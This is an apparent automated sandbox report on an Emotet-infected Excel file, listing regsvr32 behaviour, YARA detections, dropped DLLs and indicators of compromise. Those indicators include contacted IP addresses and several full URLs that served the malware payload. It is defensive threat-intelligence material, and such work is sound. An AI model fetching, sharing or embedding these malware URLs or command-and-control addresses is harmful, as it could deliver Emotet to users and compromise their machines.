Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_000007FEF9D28900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation, 3_2_000007FEF9D28860

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.regsvr32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 632071 Sample: DETAILS 25922194612.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Antivirus detection for URL or domain 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 10 other signatures 2->64 7 EXCEL.EXE 7 26 2->7         started        12 svchost.exe 2->12         started        process3 dnsIp4 50 kolejleri.com 85.114.142.153, 49174, 80 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 7->50 52 stainedglassexpress.com 66.71.247.68, 49175, 80 TOTAL-SERVER-SOLUTIONSUS United States 7->52 54 2 other IPs or domains 7->54 34 C:\Users\user\uxevr4.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr3.ocx, PE32+ 7->36 dropped 38 C:\Users\user\uxevr2.ocx, PE32+ 7->38 dropped 40 6 other malicious files 7->40 dropped 68 Document exploit detected (creates forbidden files) 7->68 70 Document exploit detected (UrlDownloadToFile) 7->70 14 regsvr32.exe 2 7->14         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        22 regsvr32.exe 2 7->22         started        file5 signatures6 process7 file8 42 C:\Windows\...\bTjwWDTWvnC.dll (copy), PE32+ 14->42 dropped 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->72 24 regsvr32.exe 14->24         started        44 C:\Windows\System32\...\rWFJGQNl.dll (copy), PE32+ 18->44 dropped 27 regsvr32.exe 2 18->27         started        46 C:\Windows\...\qlDqXeGagKnBKzd.dll (copy), PE32+ 20->46 dropped 30 regsvr32.exe 20->30         started        48 C:\Windows\System32\...\Wuiko.dll (copy), PE32+ 22->48 dropped 32 regsvr32.exe 22->32         started        signatures9 process10 dnsIp11 66 System process connects to network (likely due to code injection or exploit) 24->66 56 165.22.73.229, 49177, 49179, 49180 DIGITALOCEAN-ASNUS United States 27->56 signatures12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.114.142.153
 kolejleri.com Germany
24961 MYLOC-ASIPBackboneofmyLocmanagedITAGDE true
103.171.181.223
 learnviaonline.com unknown
7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe false
107.189.3.39
 milanstaffing.com United States
53667 PONYNETUS false
165.22.73.229
 unknown United States
14061 DIGITALOCEAN-ASNUS true
66.71.247.68
 stainedglassexpress.com United States
46562 TOTAL-SERVER-SOLUTIONSUS false

Contacted Domains

Name IP Active
kolejleri.com 85.114.142.153 true
milanstaffing.com 107.189.3.39 true
learnviaonline.com 103.171.181.223 true
stainedglassexpress.com 66.71.247.68 true
windowsupdatebg.s.llnwi.net 95.140.230.192 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://learnviaonline.com/wp-admin/qGb/ true
  • Avira URL Cloud: malware
 unknown
http://milanstaffing.com/images/D4TRnDubF/ true
  • Avira URL Cloud: malware
 unknown
http://kolejleri.com/wp-admin/REvup/ true
  • Avira URL Cloud: malware
 unknown